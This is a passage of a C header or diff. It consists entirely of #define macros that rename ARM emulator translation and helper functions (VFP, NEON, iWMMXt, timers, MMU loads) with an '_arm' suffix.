gen_helper_vfp_cmpes gen_helper_vfp_cmpes_arm +#define gen_helper_vfp_cmps gen_helper_vfp_cmps_arm +#define gen_helper_vfp_divd gen_helper_vfp_divd_arm +#define gen_helper_vfp_divs gen_helper_vfp_divs_arm +#define gen_helper_vfp_fcvtds gen_helper_vfp_fcvtds_arm +#define gen_helper_vfp_fcvt_f16_to_f32 gen_helper_vfp_fcvt_f16_to_f32_arm +#define gen_helper_vfp_fcvt_f16_to_f64 gen_helper_vfp_fcvt_f16_to_f64_arm +#define 
gen_helper_vfp_fcvt_f32_to_f16 gen_helper_vfp_fcvt_f32_to_f16_arm +#define gen_helper_vfp_fcvt_f64_to_f16 gen_helper_vfp_fcvt_f64_to_f16_arm +#define gen_helper_vfp_fcvtsd gen_helper_vfp_fcvtsd_arm +#define gen_helper_vfp_get_fpscr gen_helper_vfp_get_fpscr_arm +#define gen_helper_vfp_maxnumd gen_helper_vfp_maxnumd_arm +#define gen_helper_vfp_maxnums gen_helper_vfp_maxnums_arm +#define gen_helper_vfp_maxs gen_helper_vfp_maxs_arm +#define gen_helper_vfp_minnumd gen_helper_vfp_minnumd_arm +#define gen_helper_vfp_minnums gen_helper_vfp_minnums_arm +#define gen_helper_vfp_mins gen_helper_vfp_mins_arm +#define gen_helper_vfp_muladdd gen_helper_vfp_muladdd_arm +#define gen_helper_vfp_muladds gen_helper_vfp_muladds_arm +#define gen_helper_vfp_muld gen_helper_vfp_muld_arm +#define gen_helper_vfp_muls gen_helper_vfp_muls_arm +#define gen_helper_vfp_negd gen_helper_vfp_negd_arm +#define gen_helper_vfp_negs gen_helper_vfp_negs_arm +#define gen_helper_vfp_set_fpscr gen_helper_vfp_set_fpscr_arm +#define gen_helper_vfp_shtod gen_helper_vfp_shtod_arm +#define gen_helper_vfp_shtos gen_helper_vfp_shtos_arm +#define gen_helper_vfp_sitod gen_helper_vfp_sitod_arm +#define gen_helper_vfp_sitos gen_helper_vfp_sitos_arm +#define gen_helper_vfp_sltod gen_helper_vfp_sltod_arm +#define gen_helper_vfp_sltos gen_helper_vfp_sltos_arm +#define gen_helper_vfp_sqrtd gen_helper_vfp_sqrtd_arm +#define gen_helper_vfp_sqrts gen_helper_vfp_sqrts_arm +#define gen_helper_vfp_subd gen_helper_vfp_subd_arm +#define gen_helper_vfp_subs gen_helper_vfp_subs_arm +#define gen_helper_vfp_toshd_round_to_zero gen_helper_vfp_toshd_round_to_zero_arm +#define gen_helper_vfp_toshs_round_to_zero gen_helper_vfp_toshs_round_to_zero_arm +#define gen_helper_vfp_tosid gen_helper_vfp_tosid_arm +#define gen_helper_vfp_tosis gen_helper_vfp_tosis_arm +#define gen_helper_vfp_tosizd gen_helper_vfp_tosizd_arm +#define gen_helper_vfp_tosizs gen_helper_vfp_tosizs_arm +#define gen_helper_vfp_tosld gen_helper_vfp_tosld_arm +#define 
gen_helper_vfp_tosld_round_to_zero gen_helper_vfp_tosld_round_to_zero_arm +#define gen_helper_vfp_tosls gen_helper_vfp_tosls_arm +#define gen_helper_vfp_tosls_round_to_zero gen_helper_vfp_tosls_round_to_zero_arm +#define gen_helper_vfp_touhd_round_to_zero gen_helper_vfp_touhd_round_to_zero_arm +#define gen_helper_vfp_touhs_round_to_zero gen_helper_vfp_touhs_round_to_zero_arm +#define gen_helper_vfp_touid gen_helper_vfp_touid_arm +#define gen_helper_vfp_touis gen_helper_vfp_touis_arm +#define gen_helper_vfp_touizd gen_helper_vfp_touizd_arm +#define gen_helper_vfp_touizs gen_helper_vfp_touizs_arm +#define gen_helper_vfp_tould gen_helper_vfp_tould_arm +#define gen_helper_vfp_tould_round_to_zero gen_helper_vfp_tould_round_to_zero_arm +#define gen_helper_vfp_touls gen_helper_vfp_touls_arm +#define gen_helper_vfp_touls_round_to_zero gen_helper_vfp_touls_round_to_zero_arm +#define gen_helper_vfp_uhtod gen_helper_vfp_uhtod_arm +#define gen_helper_vfp_uhtos gen_helper_vfp_uhtos_arm +#define gen_helper_vfp_uitod gen_helper_vfp_uitod_arm +#define gen_helper_vfp_uitos gen_helper_vfp_uitos_arm +#define gen_helper_vfp_ultod gen_helper_vfp_ultod_arm +#define gen_helper_vfp_ultos gen_helper_vfp_ultos_arm +#define gen_helper_wfe gen_helper_wfe_arm +#define gen_helper_wfi gen_helper_wfi_arm +#define gen_hvc gen_hvc_arm +#define gen_intermediate_code_internal gen_intermediate_code_internal_arm +#define gen_intermediate_code_internal_a64 gen_intermediate_code_internal_a64_arm +#define gen_iwmmxt_address gen_iwmmxt_address_arm +#define gen_iwmmxt_shift gen_iwmmxt_shift_arm +#define gen_jmp gen_jmp_arm +#define gen_load_and_replicate gen_load_and_replicate_arm +#define gen_load_exclusive gen_load_exclusive_arm +#define gen_logic_CC gen_logic_CC_arm +#define gen_logicq_cc gen_logicq_cc_arm +#define gen_lookup_tb gen_lookup_tb_arm +#define gen_mov_F0_vreg gen_mov_F0_vreg_arm +#define gen_mov_F1_vreg gen_mov_F1_vreg_arm +#define gen_mov_vreg_F0 gen_mov_vreg_F0_arm +#define gen_muls_i64_i32 
gen_muls_i64_i32_arm +#define gen_mulu_i64_i32 gen_mulu_i64_i32_arm +#define gen_mulxy gen_mulxy_arm +#define gen_neon_add gen_neon_add_arm +#define gen_neon_addl gen_neon_addl_arm +#define gen_neon_addl_saturate gen_neon_addl_saturate_arm +#define gen_neon_bsl gen_neon_bsl_arm +#define gen_neon_dup_high16 gen_neon_dup_high16_arm +#define gen_neon_dup_low16 gen_neon_dup_low16_arm +#define gen_neon_dup_u8 gen_neon_dup_u8_arm +#define gen_neon_mull gen_neon_mull_arm +#define gen_neon_narrow gen_neon_narrow_arm +#define gen_neon_narrow_op gen_neon_narrow_op_arm +#define gen_neon_narrow_sats gen_neon_narrow_sats_arm +#define gen_neon_narrow_satu gen_neon_narrow_satu_arm +#define gen_neon_negl gen_neon_negl_arm +#define gen_neon_rsb gen_neon_rsb_arm +#define gen_neon_shift_narrow gen_neon_shift_narrow_arm +#define gen_neon_subl gen_neon_subl_arm +#define gen_neon_trn_u16 gen_neon_trn_u16_arm +#define gen_neon_trn_u8 gen_neon_trn_u8_arm +#define gen_neon_unarrow_sats gen_neon_unarrow_sats_arm +#define gen_neon_unzip gen_neon_unzip_arm +#define gen_neon_widen gen_neon_widen_arm +#define gen_neon_zip gen_neon_zip_arm +#define gen_new_label gen_new_label_arm +#define gen_nop_hint gen_nop_hint_arm +#define gen_op_iwmmxt_addl_M0_wRn gen_op_iwmmxt_addl_M0_wRn_arm +#define gen_op_iwmmxt_addnb_M0_wRn gen_op_iwmmxt_addnb_M0_wRn_arm +#define gen_op_iwmmxt_addnl_M0_wRn gen_op_iwmmxt_addnl_M0_wRn_arm +#define gen_op_iwmmxt_addnw_M0_wRn gen_op_iwmmxt_addnw_M0_wRn_arm +#define gen_op_iwmmxt_addsb_M0_wRn gen_op_iwmmxt_addsb_M0_wRn_arm +#define gen_op_iwmmxt_addsl_M0_wRn gen_op_iwmmxt_addsl_M0_wRn_arm +#define gen_op_iwmmxt_addsw_M0_wRn gen_op_iwmmxt_addsw_M0_wRn_arm +#define gen_op_iwmmxt_addub_M0_wRn gen_op_iwmmxt_addub_M0_wRn_arm +#define gen_op_iwmmxt_addul_M0_wRn gen_op_iwmmxt_addul_M0_wRn_arm +#define gen_op_iwmmxt_adduw_M0_wRn gen_op_iwmmxt_adduw_M0_wRn_arm +#define gen_op_iwmmxt_andq_M0_wRn gen_op_iwmmxt_andq_M0_wRn_arm +#define gen_op_iwmmxt_avgb0_M0_wRn 
gen_op_iwmmxt_avgb0_M0_wRn_arm +#define gen_op_iwmmxt_avgb1_M0_wRn gen_op_iwmmxt_avgb1_M0_wRn_arm +#define gen_op_iwmmxt_avgw0_M0_wRn gen_op_iwmmxt_avgw0_M0_wRn_arm +#define gen_op_iwmmxt_avgw1_M0_wRn gen_op_iwmmxt_avgw1_M0_wRn_arm +#define gen_op_iwmmxt_cmpeqb_M0_wRn gen_op_iwmmxt_cmpeqb_M0_wRn_arm +#define gen_op_iwmmxt_cmpeql_M0_wRn gen_op_iwmmxt_cmpeql_M0_wRn_arm +#define gen_op_iwmmxt_cmpeqw_M0_wRn gen_op_iwmmxt_cmpeqw_M0_wRn_arm +#define gen_op_iwmmxt_cmpgtsb_M0_wRn gen_op_iwmmxt_cmpgtsb_M0_wRn_arm +#define gen_op_iwmmxt_cmpgtsl_M0_wRn gen_op_iwmmxt_cmpgtsl_M0_wRn_arm +#define gen_op_iwmmxt_cmpgtsw_M0_wRn gen_op_iwmmxt_cmpgtsw_M0_wRn_arm +#define gen_op_iwmmxt_cmpgtub_M0_wRn gen_op_iwmmxt_cmpgtub_M0_wRn_arm +#define gen_op_iwmmxt_cmpgtul_M0_wRn gen_op_iwmmxt_cmpgtul_M0_wRn_arm +#define gen_op_iwmmxt_cmpgtuw_M0_wRn gen_op_iwmmxt_cmpgtuw_M0_wRn_arm +#define gen_op_iwmmxt_macsw_M0_wRn gen_op_iwmmxt_macsw_M0_wRn_arm +#define gen_op_iwmmxt_macuw_M0_wRn gen_op_iwmmxt_macuw_M0_wRn_arm +#define gen_op_iwmmxt_maddsq_M0_wRn gen_op_iwmmxt_maddsq_M0_wRn_arm +#define gen_op_iwmmxt_madduq_M0_wRn gen_op_iwmmxt_madduq_M0_wRn_arm +#define gen_op_iwmmxt_maxsb_M0_wRn gen_op_iwmmxt_maxsb_M0_wRn_arm +#define gen_op_iwmmxt_maxsl_M0_wRn gen_op_iwmmxt_maxsl_M0_wRn_arm +#define gen_op_iwmmxt_maxsw_M0_wRn gen_op_iwmmxt_maxsw_M0_wRn_arm +#define gen_op_iwmmxt_maxub_M0_wRn gen_op_iwmmxt_maxub_M0_wRn_arm +#define gen_op_iwmmxt_maxul_M0_wRn gen_op_iwmmxt_maxul_M0_wRn_arm +#define gen_op_iwmmxt_maxuw_M0_wRn gen_op_iwmmxt_maxuw_M0_wRn_arm +#define gen_op_iwmmxt_minsb_M0_wRn gen_op_iwmmxt_minsb_M0_wRn_arm +#define gen_op_iwmmxt_minsl_M0_wRn gen_op_iwmmxt_minsl_M0_wRn_arm +#define gen_op_iwmmxt_minsw_M0_wRn gen_op_iwmmxt_minsw_M0_wRn_arm +#define gen_op_iwmmxt_minub_M0_wRn gen_op_iwmmxt_minub_M0_wRn_arm +#define gen_op_iwmmxt_minul_M0_wRn gen_op_iwmmxt_minul_M0_wRn_arm +#define gen_op_iwmmxt_minuw_M0_wRn gen_op_iwmmxt_minuw_M0_wRn_arm +#define gen_op_iwmmxt_movq_M0_wRn 
gen_op_iwmmxt_movq_M0_wRn_arm +#define gen_op_iwmmxt_movq_wRn_M0 gen_op_iwmmxt_movq_wRn_M0_arm +#define gen_op_iwmmxt_mulshw_M0_wRn gen_op_iwmmxt_mulshw_M0_wRn_arm +#define gen_op_iwmmxt_mulslw_M0_wRn gen_op_iwmmxt_mulslw_M0_wRn_arm +#define gen_op_iwmmxt_muluhw_M0_wRn gen_op_iwmmxt_muluhw_M0_wRn_arm +#define gen_op_iwmmxt_mululw_M0_wRn gen_op_iwmmxt_mululw_M0_wRn_arm +#define gen_op_iwmmxt_orq_M0_wRn gen_op_iwmmxt_orq_M0_wRn_arm +#define gen_op_iwmmxt_packsl_M0_wRn gen_op_iwmmxt_packsl_M0_wRn_arm +#define gen_op_iwmmxt_packsq_M0_wRn gen_op_iwmmxt_packsq_M0_wRn_arm +#define gen_op_iwmmxt_packsw_M0_wRn gen_op_iwmmxt_packsw_M0_wRn_arm +#define gen_op_iwmmxt_packul_M0_wRn gen_op_iwmmxt_packul_M0_wRn_arm +#define gen_op_iwmmxt_packuq_M0_wRn gen_op_iwmmxt_packuq_M0_wRn_arm +#define gen_op_iwmmxt_packuw_M0_wRn gen_op_iwmmxt_packuw_M0_wRn_arm +#define gen_op_iwmmxt_sadb_M0_wRn gen_op_iwmmxt_sadb_M0_wRn_arm +#define gen_op_iwmmxt_sadw_M0_wRn gen_op_iwmmxt_sadw_M0_wRn_arm +#define gen_op_iwmmxt_set_cup gen_op_iwmmxt_set_cup_arm +#define gen_op_iwmmxt_set_mup gen_op_iwmmxt_set_mup_arm +#define gen_op_iwmmxt_setpsr_nz gen_op_iwmmxt_setpsr_nz_arm +#define gen_op_iwmmxt_subnb_M0_wRn gen_op_iwmmxt_subnb_M0_wRn_arm +#define gen_op_iwmmxt_subnl_M0_wRn gen_op_iwmmxt_subnl_M0_wRn_arm +#define gen_op_iwmmxt_subnw_M0_wRn gen_op_iwmmxt_subnw_M0_wRn_arm +#define gen_op_iwmmxt_subsb_M0_wRn gen_op_iwmmxt_subsb_M0_wRn_arm +#define gen_op_iwmmxt_subsl_M0_wRn gen_op_iwmmxt_subsl_M0_wRn_arm +#define gen_op_iwmmxt_subsw_M0_wRn gen_op_iwmmxt_subsw_M0_wRn_arm +#define gen_op_iwmmxt_subub_M0_wRn gen_op_iwmmxt_subub_M0_wRn_arm +#define gen_op_iwmmxt_subul_M0_wRn gen_op_iwmmxt_subul_M0_wRn_arm +#define gen_op_iwmmxt_subuw_M0_wRn gen_op_iwmmxt_subuw_M0_wRn_arm +#define gen_op_iwmmxt_unpackhb_M0_wRn gen_op_iwmmxt_unpackhb_M0_wRn_arm +#define gen_op_iwmmxt_unpackhl_M0_wRn gen_op_iwmmxt_unpackhl_M0_wRn_arm +#define gen_op_iwmmxt_unpackhsb_M0 gen_op_iwmmxt_unpackhsb_M0_arm +#define 
gen_op_iwmmxt_unpackhsl_M0 gen_op_iwmmxt_unpackhsl_M0_arm +#define gen_op_iwmmxt_unpackhsw_M0 gen_op_iwmmxt_unpackhsw_M0_arm +#define gen_op_iwmmxt_unpackhub_M0 gen_op_iwmmxt_unpackhub_M0_arm +#define gen_op_iwmmxt_unpackhul_M0 gen_op_iwmmxt_unpackhul_M0_arm +#define gen_op_iwmmxt_unpackhuw_M0 gen_op_iwmmxt_unpackhuw_M0_arm +#define gen_op_iwmmxt_unpackhw_M0_wRn gen_op_iwmmxt_unpackhw_M0_wRn_arm +#define gen_op_iwmmxt_unpacklb_M0_wRn gen_op_iwmmxt_unpacklb_M0_wRn_arm +#define gen_op_iwmmxt_unpackll_M0_wRn gen_op_iwmmxt_unpackll_M0_wRn_arm +#define gen_op_iwmmxt_unpacklsb_M0 gen_op_iwmmxt_unpacklsb_M0_arm +#define gen_op_iwmmxt_unpacklsl_M0 gen_op_iwmmxt_unpacklsl_M0_arm +#define gen_op_iwmmxt_unpacklsw_M0 gen_op_iwmmxt_unpacklsw_M0_arm +#define gen_op_iwmmxt_unpacklub_M0 gen_op_iwmmxt_unpacklub_M0_arm +#define gen_op_iwmmxt_unpacklul_M0 gen_op_iwmmxt_unpacklul_M0_arm +#define gen_op_iwmmxt_unpackluw_M0 gen_op_iwmmxt_unpackluw_M0_arm +#define gen_op_iwmmxt_unpacklw_M0_wRn gen_op_iwmmxt_unpacklw_M0_wRn_arm +#define gen_op_iwmmxt_xorq_M0_wRn gen_op_iwmmxt_xorq_M0_wRn_arm +#define gen_rev16 gen_rev16_arm +#define gen_revsh gen_revsh_arm +#define gen_rfe gen_rfe_arm +#define gen_sar gen_sar_arm +#define gen_sbc_CC gen_sbc_CC_arm +#define gen_sbfx gen_sbfx_arm +#define gen_set_CF_bit31 gen_set_CF_bit31_arm +#define gen_set_condexec gen_set_condexec_arm +#define gen_set_cpsr gen_set_cpsr_arm +#define gen_set_label gen_set_label_arm +#define gen_set_pc_im gen_set_pc_im_arm +#define gen_set_psr gen_set_psr_arm +#define gen_set_psr_im gen_set_psr_im_arm +#define gen_shl gen_shl_arm +#define gen_shr gen_shr_arm +#define gen_smc gen_smc_arm +#define gen_smul_dual gen_smul_dual_arm +#define gen_srs gen_srs_arm +#define gen_ss_advance gen_ss_advance_arm +#define gen_step_complete_exception gen_step_complete_exception_arm +#define gen_store_exclusive gen_store_exclusive_arm +#define gen_storeq_reg gen_storeq_reg_arm +#define gen_sub_carry gen_sub_carry_arm +#define gen_sub_CC 
gen_sub_CC_arm +#define gen_subq_msw gen_subq_msw_arm +#define gen_swap_half gen_swap_half_arm +#define gen_thumb2_data_op gen_thumb2_data_op_arm +#define gen_thumb2_parallel_addsub gen_thumb2_parallel_addsub_arm +#define gen_ubfx gen_ubfx_arm +#define gen_vfp_abs gen_vfp_abs_arm +#define gen_vfp_add gen_vfp_add_arm +#define gen_vfp_cmp gen_vfp_cmp_arm +#define gen_vfp_cmpe gen_vfp_cmpe_arm +#define gen_vfp_div gen_vfp_div_arm +#define gen_vfp_F1_ld0 gen_vfp_F1_ld0_arm +#define gen_vfp_F1_mul gen_vfp_F1_mul_arm +#define gen_vfp_F1_neg gen_vfp_F1_neg_arm +#define gen_vfp_ld gen_vfp_ld_arm +#define gen_vfp_mrs gen_vfp_mrs_arm +#define gen_vfp_msr gen_vfp_msr_arm +#define gen_vfp_mul gen_vfp_mul_arm +#define gen_vfp_neg gen_vfp_neg_arm +#define gen_vfp_shto gen_vfp_shto_arm +#define gen_vfp_sito gen_vfp_sito_arm +#define gen_vfp_slto gen_vfp_slto_arm +#define gen_vfp_sqrt gen_vfp_sqrt_arm +#define gen_vfp_st gen_vfp_st_arm +#define gen_vfp_sub gen_vfp_sub_arm +#define gen_vfp_tosh gen_vfp_tosh_arm +#define gen_vfp_tosi gen_vfp_tosi_arm +#define gen_vfp_tosiz gen_vfp_tosiz_arm +#define gen_vfp_tosl gen_vfp_tosl_arm +#define gen_vfp_touh gen_vfp_touh_arm +#define gen_vfp_toui gen_vfp_toui_arm +#define gen_vfp_touiz gen_vfp_touiz_arm +#define gen_vfp_toul gen_vfp_toul_arm +#define gen_vfp_uhto gen_vfp_uhto_arm +#define gen_vfp_uito gen_vfp_uito_arm +#define gen_vfp_ulto gen_vfp_ulto_arm +#define get_arm_cp_reginfo get_arm_cp_reginfo_arm +#define get_clock get_clock_arm +#define get_clock_realtime get_clock_realtime_arm +#define get_constraint_priority get_constraint_priority_arm +#define get_float_exception_flags get_float_exception_flags_arm +#define get_float_rounding_mode get_float_rounding_mode_arm +#define get_fpstatus_ptr get_fpstatus_ptr_arm +#define get_level1_table_address get_level1_table_address_arm +#define get_mem_index get_mem_index_arm +#define get_next_param_value get_next_param_value_arm +#define get_opt_name get_opt_name_arm +#define get_opt_value 
get_opt_value_arm +#define get_page_addr_code get_page_addr_code_arm +#define get_param_value get_param_value_arm +#define get_phys_addr get_phys_addr_arm +#define get_phys_addr_lpae get_phys_addr_lpae_arm +#define get_phys_addr_mpu get_phys_addr_mpu_arm +#define get_phys_addr_v5 get_phys_addr_v5_arm +#define get_phys_addr_v6 get_phys_addr_v6_arm +#define get_system_memory get_system_memory_arm +#define get_ticks_per_sec get_ticks_per_sec_arm +#define g_list_insert_sorted_merged g_list_insert_sorted_merged_arm +#define _GLOBAL_OFFSET_TABLE_ _GLOBAL_OFFSET_TABLE__arm +#define gt_cntfrq_access gt_cntfrq_access_arm +#define gt_cnt_read gt_cnt_read_arm +#define gt_cnt_reset gt_cnt_reset_arm +#define gt_counter_access gt_counter_access_arm +#define gt_ctl_write gt_ctl_write_arm +#define gt_cval_write gt_cval_write_arm +#define gt_get_countervalue gt_get_countervalue_arm +#define gt_pct_access gt_pct_access_arm +#define gt_ptimer_access gt_ptimer_access_arm +#define gt_recalc_timer gt_recalc_timer_arm +#define gt_timer_access gt_timer_access_arm +#define gt_tval_read gt_tval_read_arm +#define gt_tval_write gt_tval_write_arm +#define gt_vct_access gt_vct_access_arm +#define gt_vtimer_access gt_vtimer_access_arm +#define guest_phys_blocks_free guest_phys_blocks_free_arm +#define guest_phys_blocks_init guest_phys_blocks_init_arm +#define handle_vcvt handle_vcvt_arm +#define handle_vminmaxnm handle_vminmaxnm_arm +#define handle_vrint handle_vrint_arm +#define handle_vsel handle_vsel_arm +#define has_help_option has_help_option_arm +#define have_bmi1 have_bmi1_arm +#define have_bmi2 have_bmi2_arm +#define hcr_write hcr_write_arm +#define helper_access_check_cp_reg helper_access_check_cp_reg_arm +#define helper_add_saturate helper_add_saturate_arm +#define helper_add_setq helper_add_setq_arm +#define helper_add_usaturate helper_add_usaturate_arm +#define helper_be_ldl_cmmu helper_be_ldl_cmmu_arm +#define helper_be_ldq_cmmu helper_be_ldq_cmmu_arm +#define helper_be_ldq_mmu 
helper_be_ldq_mmu_arm +#define helper_be_ldsl_mmu helper_be_ldsl_mmu_arm +#define helper_be_ldsw_mmu helper_be_ldsw_mmu_arm +#define helper_be_ldul_mmu helper_be_ldul_mmu_arm +#define helper_be_lduw_mmu helper_be_lduw_mmu_arm +#define helper_be_ldw_cmmu helper_be_ldw_cmmu_arm +#define helper_be_stl_mmu helper_be_stl_mmu_arm +#define helper_be_stq_mmu helper_be_stq_mmu_arm +#define helper_be_stw_mmu helper_be_stw_mmu_arm +#define helper_clear_pstate_ss helper_clear_pstate_ss_arm +#define helper_clz_arm helper_clz_arm_arm +#define helper_cpsr_read helper_cpsr_read_arm +#define helper_cpsr_write helper_cpsr_write_arm +#define helper_crc32_arm helper_crc32_arm_arm +#define helper_crc32c helper_crc32c_arm +#define helper_crypto_aese helper_crypto_aese_arm +#define helper_crypto_aesmc helper_crypto_aesmc_arm +#define helper_crypto_sha1_3reg helper_crypto_sha1_3reg_arm +#define helper_crypto_sha1h helper_crypto_sha1h_arm +#define helper_crypto_sha1su1 helper_crypto_sha1su1_arm +#define helper_crypto_sha256h helper_crypto_sha256h_arm +#define helper_crypto_sha256h2 helper_crypto_sha256h2_arm +#define helper_crypto_sha256su0 helper_crypto_sha256su0_arm +#define helper_crypto_sha256su1 helper_crypto_sha256su1_arm +#define helper_dc_zva helper_dc_zva_arm +#define helper_double_saturate helper_double_saturate_arm +#define helper_exception_internal helper_exception_internal_arm +#define helper_exception_return helper_exception_return_arm +#define helper_exception_with_syndrome helper_exception_with_syndrome_arm +#define helper_get_cp_reg helper_get_cp_reg_arm +#define helper_get_cp_reg64 helper_get_cp_reg64_arm +#define helper_get_r13_banked helper_get_r13_banked_arm +#define helper_get_user_reg helper_get_user_reg_arm +#define helper_iwmmxt_addcb helper_iwmmxt_addcb_arm +#define helper_iwmmxt_addcl helper_iwmmxt_addcl_arm +#define helper_iwmmxt_addcw helper_iwmmxt_addcw_arm +#define helper_iwmmxt_addnb helper_iwmmxt_addnb_arm +#define helper_iwmmxt_addnl 
helper_iwmmxt_addnl_arm +#define helper_iwmmxt_addnw helper_iwmmxt_addnw_arm +#define helper_iwmmxt_addsb helper_iwmmxt_addsb_arm +#define helper_iwmmxt_addsl helper_iwmmxt_addsl_arm +#define helper_iwmmxt_addsw helper_iwmmxt_addsw_arm +#define helper_iwmmxt_addub helper_iwmmxt_addub_arm +#define helper_iwmmxt_addul helper_iwmmxt_addul_arm +#define helper_iwmmxt_adduw helper_iwmmxt_adduw_arm +#define helper_iwmmxt_align helper_iwmmxt_align_arm +#define helper_iwmmxt_avgb0 helper_iwmmxt_avgb0_arm +#define helper_iwmmxt_avgb1 helper_iwmmxt_avgb1_arm +#define helper_iwmmxt_avgw0 helper_iwmmxt_avgw0_arm +#define helper_iwmmxt_avgw1 helper_iwmmxt_avgw1_arm +#define helper_iwmmxt_bcstb helper_iwmmxt_bcstb_arm +#define helper_iwmmxt_bcstl helper_iwmmxt_bcstl_arm +#define helper_iwmmxt_bcstw helper_iwmmxt_bcstw_arm +#define helper_iwmmxt_cmpeqb helper_iwmmxt_cmpeqb_arm +#define helper_iwmmxt_cmpeql helper_iwmmxt_cmpeql_arm +#define helper_iwmmxt_cmpeqw helper_iwmmxt_cmpeqw_arm +#define helper_iwmmxt_cmpgtsb helper_iwmmxt_cmpgtsb_arm +#define helper_iwmmxt_cmpgtsl helper_iwmmxt_cmpgtsl_arm +#define helper_iwmmxt_cmpgtsw helper_iwmmxt_cmpgtsw_arm +#define helper_iwmmxt_cmpgtub helper_iwmmxt_cmpgtub_arm +#define helper_iwmmxt_cmpgtul helper_iwmmxt_cmpgtul_arm +#define helper_iwmmxt_cmpgtuw helper_iwmmxt_cmpgtuw_arm +#define helper_iwmmxt_insr helper_iwmmxt_insr_arm +#define helper_iwmmxt_macsw helper_iwmmxt_macsw_arm +#define helper_iwmmxt_macuw helper_iwmmxt_macuw_arm +#define helper_iwmmxt_maddsq helper_iwmmxt_maddsq_arm +#define helper_iwmmxt_madduq helper_iwmmxt_madduq_arm +#define helper_iwmmxt_maxsb helper_iwmmxt_maxsb_arm +#define helper_iwmmxt_maxsl helper_iwmmxt_maxsl_arm +#define helper_iwmmxt_maxsw helper_iwmmxt_maxsw_arm +#define helper_iwmmxt_maxub helper_iwmmxt_maxub_arm +#define helper_iwmmxt_maxul helper_iwmmxt_maxul_arm +#define helper_iwmmxt_maxuw helper_iwmmxt_maxuw_arm +#define helper_iwmmxt_minsb helper_iwmmxt_minsb_arm +#define helper_iwmmxt_minsl 
helper_iwmmxt_minsl_arm +#define helper_iwmmxt_minsw helper_iwmmxt_minsw_arm +#define helper_iwmmxt_minub helper_iwmmxt_minub_arm +#define helper_iwmmxt_minul helper_iwmmxt_minul_arm +#define helper_iwmmxt_minuw helper_iwmmxt_minuw_arm +#define helper_iwmmxt_msbb helper_iwmmxt_msbb_arm +#define helper_iwmmxt_msbl helper_iwmmxt_msbl_arm +#define helper_iwmmxt_msbw helper_iwmmxt_msbw_arm +#define helper_iwmmxt_muladdsl helper_iwmmxt_muladdsl_arm +#define helper_iwmmxt_muladdsw helper_iwmmxt_muladdsw_arm +#define helper_iwmmxt_muladdswl helper_iwmmxt_muladdswl_arm +#define helper_iwmmxt_mulshw helper_iwmmxt_mulshw_arm +#define helper_iwmmxt_mulslw helper_iwmmxt_mulslw_arm +#define helper_iwmmxt_muluhw helper_iwmmxt_muluhw_arm +#define helper_iwmmxt_mululw helper_iwmmxt_mululw_arm +#define helper_iwmmxt_packsl helper_iwmmxt_packsl_arm +#define helper_iwmmxt_packsq helper_iwmmxt_packsq_arm +#define helper_iwmmxt_packsw helper_iwmmxt_packsw_arm +#define helper_iwmmxt_packul helper_iwmmxt_packul_arm +#define helper_iwmmxt_packuq helper_iwmmxt_packuq_arm +#define helper_iwmmxt_packuw helper_iwmmxt_packuw_arm +#define helper_iwmmxt_rorl helper_iwmmxt_rorl_arm +#define helper_iwmmxt_rorq helper_iwmmxt_rorq_arm +#define helper_iwmmxt_rorw helper_iwmmxt_rorw_arm +#define helper_iwmmxt_sadb helper_iwmmxt_sadb_arm +#define helper_iwmmxt_sadw helper_iwmmxt_sadw_arm +#define helper_iwmmxt_setpsr_nz helper_iwmmxt_setpsr_nz_arm +#define helper_iwmmxt_shufh helper_iwmmxt_shufh_arm +#define helper_iwmmxt_slll helper_iwmmxt_slll_arm +#define helper_iwmmxt_sllq helper_iwmmxt_sllq_arm +#define helper_iwmmxt_sllw helper_iwmmxt_sllw_arm +#define helper_iwmmxt_sral helper_iwmmxt_sral_arm +#define helper_iwmmxt_sraq helper_iwmmxt_sraq_arm +#define helper_iwmmxt_sraw helper_iwmmxt_sraw_arm +#define helper_iwmmxt_srll helper_iwmmxt_srll_arm +#define helper_iwmmxt_srlq helper_iwmmxt_srlq_arm +#define helper_iwmmxt_srlw helper_iwmmxt_srlw_arm +#define helper_iwmmxt_subnb helper_iwmmxt_subnb_arm 
+#define helper_iwmmxt_subnl helper_iwmmxt_subnl_arm +#define helper_iwmmxt_subnw helper_iwmmxt_subnw_arm +#define helper_iwmmxt_subsb helper_iwmmxt_subsb_arm +#define helper_iwmmxt_subsl helper_iwmmxt_subsl_arm +#define helper_iwmmxt_subsw helper_iwmmxt_subsw_arm +#define helper_iwmmxt_subub helper_iwmmxt_subub_arm +#define helper_iwmmxt_subul helper_iwmmxt_subul_arm +#define helper_iwmmxt_subuw helper_iwmmxt_subuw_arm +#define helper_iwmmxt_unpackhb helper_iwmmxt_unpackhb_arm +#define helper_iwmmxt_unpackhl helper_iwmmxt_unpackhl_arm +#define helper_iwmmxt_unpackhsb helper_iwmmxt_unpackhsb_arm +#define helper_iwmmxt_unpackhsl helper_iwmmxt_unpackhsl_arm +#define helper_iwmmxt_unpackhsw helper_iwmmxt_unpackhsw_arm +#define helper_iwmmxt_unpackhub helper_iwmmxt_unpackhub_arm +#define helper_iwmmxt_unpackhul helper_iwmmxt_unpackhul_arm +#define helper_iwmmxt_unpackhuw helper_iwmmxt_unpackhuw_arm +#define helper_iwmmxt_unpackhw helper_iwmmxt_unpackhw_arm +#define helper_iwmmxt_unpacklb helper_iwmmxt_unpacklb_arm +#define helper_iwmmxt_unpackll helper_iwmmxt_unpackll_arm +#define helper_iwmmxt_unpacklsb helper_iwmmxt_unpacklsb_arm +#define helper_iwmmxt_unpacklsl helper_iwmmxt_unpacklsl_arm +#define helper_iwmmxt_unpacklsw helper_iwmmxt_unpacklsw_arm +#define helper_iwmmxt_unpacklub helper_iwmmxt_unpacklub_arm +#define helper_iwmmxt_unpacklul helper_iwmmxt_unpacklul_arm +#define helper_iwmmxt_unpackluw helper_iwmmxt_unpackluw_arm +#define helper_iwmmxt_unpacklw helper_iwmmxt_unpacklw_arm +#define helper_ldb_cmmu helper_ldb_cmmu_arm +#define helper_ldb_mmu helper_ldb_mmu_arm +#define helper_ldl_cmmu helper_ldl_cmmu_arm +#define helper_ldl_mmu helper_ldl_mmu_arm +#define helper_ldq_cmmu helper_ldq_cmmu_arm +#define helper_ldq_mmu helper_ldq_mmu_arm +#define helper_ldw_cmmu helper_ldw_cmmu_arm +#define helper_ldw_mmu helper_ldw_mmu_arm +#define helper_le_ldl_cmmu helper_le_ldl_cmmu_arm +#define helper_le_ldq_cmmu helper_le_ldq_cmmu_arm +#define helper_le_ldq_mmu 
